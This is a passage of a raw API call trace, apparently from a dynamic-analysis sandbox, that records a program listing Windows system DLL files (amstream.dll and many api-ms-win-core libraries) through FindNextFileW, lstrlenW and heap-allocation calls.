ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="amstream.dll", cAlternateFileName="")) returned 1 [0027.700] lstrlenW (lpString="amstream.dll") returned 12 [0027.700] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44e770 [0027.700] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76fcd8be, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x76fcd8be, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e0853e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amxread.dll", cAlternateFileName="")) returned 1 [0027.700] lstrlenW (lpString="amxread.dll") returned 11 [0027.700] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44e818 [0027.700] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41bceeb, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xd41bceeb, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e4d7330, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apds.dll", cAlternateFileName="")) returned 1 [0027.701] lstrlenW (lpString="apds.dll") returned 8 [0027.701] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x92) returned 0x44e8b8 [0027.701] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf21dc5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf21dc5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-console-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.701] lstrlenW (lpString="api-ms-win-core-console-l1-1-0.dll") returned 34 [0027.701] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc6) returned 0x44e958 [0027.701] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cefbc66, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cefbc66, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-datetime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.701] lstrlenW (lpString="api-ms-win-core-datetime-l1-1-0.dll") returned 35 [0027.701] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc8) returned 0x44ea28 [0027.701] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd32bf2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd32bf2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-debug-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-debug-l1-1-0.dll") returned 32 [0027.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc2) returned 0x44eaf8 [0027.702] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-delayload-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-delayload-l1-1-0.dll") returned 36 [0027.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xca) returned 0x44ebc8 [0027.702] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2ccc07d5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2ccc07d5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-errorhandling-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-errorhandling-l1-1-0.dll") returned 40 [0027.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x44eca0 [0027.702] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd7eeb0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd7eeb0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-fibers-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-fibers-l1-1-0.dll") returned 33 [0027.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44ed80 [0027.702] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-file-l1-1-0.dll") returned 31 [0027.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44ee50 [0027.702] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="")) returned 1 [0027.702] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44ef18 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44cf40 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cfe04a0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cfe04a0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-handle-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-handle-l1-1-0.dll") returned 33 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44d008 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-heap-l1-1-0.dll") returned 31 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44d0d8 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d078a1c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d078a1c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-interlocked-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-interlocked-l1-1-0.dll") returned 38 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xce) returned 0x44d1a0 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-io-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-io-l1-1-0.dll") returned 29 [0027.703] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xbc) returned 0x44d278 [0027.703] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-libraryloader-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.703] lstrlenW (lpString="api-ms-win-core-libraryloader-l1-1-0.dll") returned 40 [0027.704] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x44d340 [0027.704] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.704] lstrlenW (lpString="api-ms-win-core-localization-l1-1-0.dll") returned 39 [0027.704] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd0) returned 0x44d420 [0027.704] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="")) returned 1 [0027.704] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0027.704] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd0) returned 0x44d4f8 [0027.704] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localregistry-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.704] lstrlenW (lpString="api-ms-win-core-localregistry-l1-1-0.dll") returned 40 [0027.704] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x44d5d0 [0027.704] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0eae39, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0eae39, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-memory-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.704] lstrlenW (lpString="api-ms-win-core-memory-l1-1-0.dll") returned 33 [0027.704] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44d6b0 [0027.704] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-misc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.704] lstrlenW (lpString="api-ms-win-core-misc-l1-1-0.dll") returned 31 [0027.705] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44d780 [0027.705] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-namedpipe-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.705] lstrlenW (lpString="api-ms-win-core-namedpipe-l1-1-0.dll") returned 36 [0027.705] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xca) returned 0x44d848 [0027.705] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processenvironment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.705] lstrlenW (lpString="api-ms-win-core-processenvironment-l1-1-0.dll") returned 45 [0027.705] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xdc) returned 0x44d920 [0027.705] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.705] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-0.dll") returned 41 [0027.705] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd4) returned 0x44da08 [0027.705] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="")) returned 1 [0027.705] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0027.705] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd4) returned 0x44dae8 [0027.705] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-profile-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.707] lstrlenW (lpString="api-ms-win-core-profile-l1-1-0.dll") returned 34 [0027.707] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc6) returned 0x44dbc8 [0027.707] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-rtlsupport-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.707] lstrlenW (lpString="api-ms-win-core-rtlsupport-l1-1-0.dll") returned 37 [0027.707] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xcc) returned 0x44dc98 [0027.707] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1cf673, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1cf673, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.707] lstrlenW (lpString="api-ms-win-core-string-l1-1-0.dll") returned 33 [0027.707] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44dd70 [0027.707] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d241a90, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d241a90, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.707] lstrlenW (lpString="api-ms-win-core-synch-l1-1-0.dll") returned 32 [0027.707] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc2) returned 0x44de40 [0027.707] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="")) returned 1 [0027.707] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0027.707] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc2) returned 0x44df10 [0027.708] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-sysinfo-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.708] lstrlenW (lpString="api-ms-win-core-sysinfo-l1-1-0.dll") returned 34 [0027.708] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc6) returned 0x44dfe0 [0027.708] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d265d70, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-threadpool-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.708] lstrlenW (lpString="api-ms-win-core-threadpool-l1-1-0.dll") returned 37 [0027.708] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xcc) returned 0x44e0b0 [0027.708] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.708] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0027.708] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc8) returned 0x44efe8 [0027.708] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d21b931, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d21b931, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d21a280, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-util-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.708] lstrlenW (lpString="api-ms-win-core-util-l1-1-0.dll") returned 31 [0027.708] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44f0b8 [0027.708] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d9fe1dc, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d9fe1dc, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d9fd330, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.708] 